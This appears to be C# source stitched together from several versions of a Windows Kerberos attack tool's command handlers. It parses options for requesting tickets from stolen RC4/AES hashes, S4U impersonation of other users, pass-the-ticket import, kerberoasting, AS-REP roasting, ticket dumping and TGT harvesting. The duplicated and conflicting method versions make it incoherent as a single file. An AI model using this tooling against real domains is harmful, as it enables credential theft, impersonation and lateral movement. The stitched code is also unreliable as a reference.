public void Execute(Dictionary <string, string> arguments)
{
if (arguments.ContainsKey("/program"))
{
LSA.CreateProcessNetOnly(arguments["/program"], arguments.ContainsKey("/show"));
}
else
{
Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n");
}
}
public void Execute(Dictionary <string, string> arguments)
{
string user = "";
string domain = "";
string password = "";
string hash = "";
string dc = "";
bool ptt = false;
Interop.LUID luid = new Interop.LUID();
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
string[] parts = arguments["/user"].Split('\\');
if (parts.Length == 2)
{
domain = parts[0];
user = parts[1];
}
else
{
user = arguments["/user"];
}
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/password"))
{
password = arguments["/password"];
if (arguments.ContainsKey("/enctype") && arguments["/enctype"].ToUpper().Equals("AES256"))
{
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
// compute AES key from pwd
byte[] password_bytes = System.Text.Encoding.UTF8.GetBytes(password);
byte[] salt = System.Text.Encoding.UTF8.GetBytes(domain.ToUpper() + user);
byte[] aes256_key = Crypto.ComputeAES256KerberosKey(password_bytes, salt);
hash = System.BitConverter.ToString(aes256_key).Replace("-", "");
}
else // default is RC4
{
// compute NTLM from pwd
encType = Interop.KERB_ETYPE.rc4_hmac;
byte[] ntlm = Crypto.ComputeRC4KerberosKey(password); // a.k.a NTLM
hash = System.BitConverter.ToString(ntlm).Replace("-", "");
}
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/luid"))
{
try
{
luid = new Interop.LUID(arguments["/luid"]);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
return;
}
}
if (arguments.ContainsKey("/createnetonly"))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
if (arguments.ContainsKey("/show"))
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
}
else
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
}
Console.WriteLine();
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /password or /rc4 hash or /aes256 hash!\r\n");
return;
}
if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
return;
}
else
{
Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
return;
}
}
public void Execute(Dictionary <string, string> arguments)
{
string user = "";
string domain = "";
string password = "";
string hash = "";
string dc = "";
bool ptt = false;
Interop.LUID luid = new Interop.LUID();
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
string[] parts = arguments["/user"].Split('\\');
if (parts.Length == 2)
{
domain = parts[0];
user = parts[1];
}
else
{
user = arguments["/user"];
}
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/password"))
{
password = arguments["/password"];
string salt = String.Format("{0}{1}", domain.ToUpper(), user.ToLower());
encType = Interop.KERB_ETYPE.rc4_hmac; //default is non /enctype is specified
if (arguments.ContainsKey("/enctype"))
{
string encTypeString = arguments["/enctype"].ToUpper();
if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM"))
{
encType = Interop.KERB_ETYPE.rc4_hmac;
}
else if (encTypeString.Equals("AES128"))
{
encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
}
else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES"))
{
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
else if (encTypeString.Equals("DES"))
{
encType = Interop.KERB_ETYPE.des_cbc_md5;
}
}
hash = Crypto.KerberosPasswordHash(encType, password, salt);
}
else if (arguments.ContainsKey("/des"))
{
hash = arguments["/des"];
encType = Interop.KERB_ETYPE.des_cbc_md5;
}
else if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
else if (arguments.ContainsKey("/ntlm"))
{
hash = arguments["/ntlm"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
else if (arguments.ContainsKey("/aes128"))
{
hash = arguments["/aes128"];
encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
}
else if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/luid"))
{
try
{
luid = new Interop.LUID(arguments["/luid"]);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/luid"]);
return;
}
}
if (arguments.ContainsKey("/createnetonly"))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
if (arguments.ContainsKey("/show"))
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
}
else
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
}
Console.WriteLine();
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /password , or a [/des|/rc4|/aes128|/aes256] hash!\r\n");
return;
}
if (!((encType == Interop.KERB_ETYPE.des_cbc_md5) || (encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
return;
}
else
{
Ask.TGT(user, domain, hash, encType, ptt, dc, luid, true);
return;
}
}
public void Execute(Dictionary <string, string> arguments)
{
string user = "";
uint luid = 0;
string domain;
string userValue;
if (arguments.TryGetValue("/user", out userValue))
{
string[] parts = userValue.Split('\\');
switch (parts.Length)
{
case 1:
user = userValue;
break;
case 2:
domain = parts[0];
user = parts[1];
break;
default:
Console.WriteLine("\r\n[X] Invalid user value syntax.\r\n");
return;
}
}
// TODO : Clarify in source code for overlap with composite user name.
if (!arguments.TryGetValue("/domain", out domain))
{
domain = string.Empty;
}
string dc;
if (!arguments.TryGetValue("/dc", out dc))
{
dc = string.Empty;
}
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
string hash;
if (arguments.TryGetValue("/rc4", out hash))
{
encType = Interop.KERB_ETYPE.rc4_hmac;
}
else if (arguments.TryGetValue("/aes256", out hash))
{
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (string.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
bool ptt = arguments.ContainsKey("/ptt");
string luidValue;
if (arguments.TryGetValue("/luid", out luidValue))
{
try {
luid = uint.Parse(luidValue);
}
catch {
try {
luid = Convert.ToUInt32(luidValue, 16);
}
catch {
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", luidValue);
return;
}
}
}
string createnetonlyValue;
if (arguments.TryGetValue("/createnetonly", out createnetonlyValue))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
luid = LSA.CreateProcessNetOnly(createnetonlyValue, arguments.ContainsKey("/show"));
Console.WriteLine();
}
if (string.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (string.IsNullOrEmpty(domain))
{
domain = IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
return;
}
Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
return;
}
static void Main(string[] args)
{
Logo();
var arguments = new Dictionary <string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
arguments[argument] = "";
}
}
if (arguments.ContainsKey("asktgt"))
{
string user = "";
string domain = "";
string hash = "";
string dc = "";
bool ptt = false;
uint luid = 0;
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
if (arguments.ContainsKey("/createnetonly"))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
if (arguments.ContainsKey("/show"))
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
}
else
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
}
Console.WriteLine();
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
return;
}
else
{
Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
return;
}
}
if (arguments.ContainsKey("renew"))
{
bool ptt = false;
string dc = "";
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
if (arguments.ContainsKey("/autorenew"))
{
// if we want to auto-renew the TGT up until the renewal limit
Renew.TGTAutoRenew(kirbi, dc);
}
else
{
// otherwise a single renew operation
byte[] blah = Renew.TGT(kirbi, ptt, dc);
}
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
if (arguments.ContainsKey("/autorenew"))
{
// if we want to auto-renew the TGT up until the renewal limit
Renew.TGTAutoRenew(kirbi, dc);
}
else
{
// otherwise a single renew operation
byte[] blah = Renew.TGT(kirbi, ptt, dc);
}
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for renewal!\r\n");
return;
}
}
if (arguments.ContainsKey("s4u"))
{
string targetUser = "";
string targetSPN = "";
string altSname = "";
string user = "";
string domain = "";
string hash = "";
bool ptt = false;
string dc = "";
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/impersonateuser"))
{
targetUser = arguments["/impersonateuser"];
}
if (arguments.ContainsKey("/msdsspn"))
{
targetSPN = arguments["/msdsspn"];
}
if (arguments.ContainsKey("/altservice"))
{
altSname = arguments["/altservice"];
}
if (String.IsNullOrEmpty(targetUser))
{
Console.WriteLine("\r\n[X] You must supply a /impersonateuser to impersonate!\r\n");
return;
}
if (String.IsNullOrEmpty(targetSPN))
{
Console.WriteLine("\r\n[X] You must supply a /msdsspn !\r\n");
return;
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else if (arguments.ContainsKey("/user"))
{
// if the user is supplying a user and rc4/aes256 hash to first execute a TGT request
user = arguments["/user"];
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname);
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied for S4U!");
Console.WriteLine("[X] Alternatively, supply a /user and </rc4:X | /aes256:X> hash to first retrieve a TGT.\r\n");
return;
}
}
if (arguments.ContainsKey("ptt"))
{
uint luid = 0;
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
LSA.ImportTicket(kirbiBytes, luid);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
LSA.ImportTicket(kirbiBytes, luid);
}
else
{
Console.WriteLine("\r\n[X]/ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi file needs to be supplied!\r\n");
return;
}
}
if (arguments.ContainsKey("purge"))
{
uint luid = 0;
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
LSA.Purge(luid);
}
else if (arguments.ContainsKey("kerberoast"))
{
string spn = "";
string user = "";
string OU = "";
if (arguments.ContainsKey("/spn"))
{
spn = arguments["/spn"];
}
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/ou"))
{
OU = arguments["/ou"];
}
if (arguments.ContainsKey("/creduser"))
{
if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase))
{
Console.WriteLine("\r\n[X] /creduser specification must be in fqdn format (domain.com\\user)\r\n");
return;
}
string[] parts = arguments["/creduser"].Split('\\');
string domainName = parts[0];
string userName = parts[1];
if (!arguments.ContainsKey("/credpassword"))
{
Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n");
return;
}
string password = arguments["/credpassword"];
System.Net.NetworkCredential cred = new System.Net.NetworkCredential(userName, password, domainName);
Roast.Kerberoast(spn, user, OU, cred);
}
else
{
Roast.Kerberoast(spn, user, OU);
}
}
else if (arguments.ContainsKey("asreproast"))
{
string user = "";
string domain = "";
string dc = "";
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(dc))
{
Roast.ASRepRoast(user, domain);
}
else
{
Roast.ASRepRoast(user, domain, dc);
}
}
else if (arguments.ContainsKey("dump"))
{
if (arguments.ContainsKey("/luid"))
{
string service = "";
if (arguments.ContainsKey("/service"))
{
service = arguments["/service"];
}
UInt32 luid = 0;
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
LSA.ListKerberosTicketData(luid, service);
}
else if (arguments.ContainsKey("/service"))
{
LSA.ListKerberosTicketData(0, arguments["/service"]);
}
else
{
LSA.ListKerberosTicketData();
}
}
else if (arguments.ContainsKey("monitor"))
{
string targetUser = "";
int interval = 60;
if (arguments.ContainsKey("/filteruser"))
{
targetUser = arguments["/filteruser"];
}
if (arguments.ContainsKey("/interval"))
{
interval = Int32.Parse(arguments["/interval"]);
}
Harvest.Monitor4624(interval, targetUser);
}
else if (arguments.ContainsKey("harvest"))
{
int intervalMinutes = 60;
if (arguments.ContainsKey("/interval"))
{
intervalMinutes = Int32.Parse(arguments["/interval"]);
}
Harvest.HarvestTGTs(intervalMinutes);
}
else if (arguments.ContainsKey("describe"))
{
if (arguments.ContainsKey("/ticket"))
{
string kirbi64 = arguments["/ticket"];
if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
LSA.DisplayTicket(kirbi);
}
else
{
Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
}
return;
}
else
{
Console.WriteLine("\r\n[X] A base64 .kirbi /ticket file needs to be supplied!\r\n");
return;
}
}
else if (arguments.ContainsKey("createnetonly"))
{
if (arguments.ContainsKey("/program"))
{
if (arguments.ContainsKey("/show"))
{
LSA.CreateProcessNetOnly(arguments["/program"], true);
}
else
{
LSA.CreateProcessNetOnly(arguments["/program"]);
}
}
else
{
Console.WriteLine("\r\n[X] A /program needs to be supplied!\r\n");
}
}
else
{
Usage();
}
}
public void Execute(Dictionary <string, string> arguments)
{
string user = "";
string domain = "";
string hash = "";
string dc = "";
bool ptt = false;
uint luid = 0;
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
if (arguments.ContainsKey("/user"))
{
user = arguments["/user"];
}
if (arguments.ContainsKey("/domain"))
{
domain = arguments["/domain"];
}
if (arguments.ContainsKey("/dc"))
{
dc = arguments["/dc"];
}
if (arguments.ContainsKey("/rc4"))
{
hash = arguments["/rc4"];
encType = Interop.KERB_ETYPE.rc4_hmac;
}
if (arguments.ContainsKey("/aes256"))
{
hash = arguments["/aes256"];
encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
}
if (arguments.ContainsKey("/ptt"))
{
ptt = true;
}
if (arguments.ContainsKey("/luid"))
{
try
{
luid = UInt32.Parse(arguments["/luid"]);
}
catch
{
try
{
luid = Convert.ToUInt32(arguments["/luid"], 16);
}
catch
{
Console.WriteLine("[X] Invalid LUID format ({0})\r\n", arguments["/LUID"]);
return;
}
}
}
if (arguments.ContainsKey("/createnetonly"))
{
// if we're starting a hidden process to apply the ticket to
if (!Helpers.IsHighIntegrity())
{
Console.WriteLine("[X] You need to be in high integrity to apply a ticket to created logon session");
return;
}
if (arguments.ContainsKey("/show"))
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], true);
}
else
{
luid = LSA.CreateProcessNetOnly(arguments["/createnetonly"], false);
}
Console.WriteLine();
}
if (String.IsNullOrEmpty(user))
{
Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
return;
}
if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(hash))
{
Console.WriteLine("\r\n[X] You must supply a /rc4 or /aes256 hash!\r\n");
return;
}
if (!((encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)))
{
Console.WriteLine("\r\n[X] Only /rc4 and /aes256 are supported at this time.\r\n");
return;
}
else
{
Ask.TGT(user, domain, hash, encType, ptt, dc, luid);
return;
}
}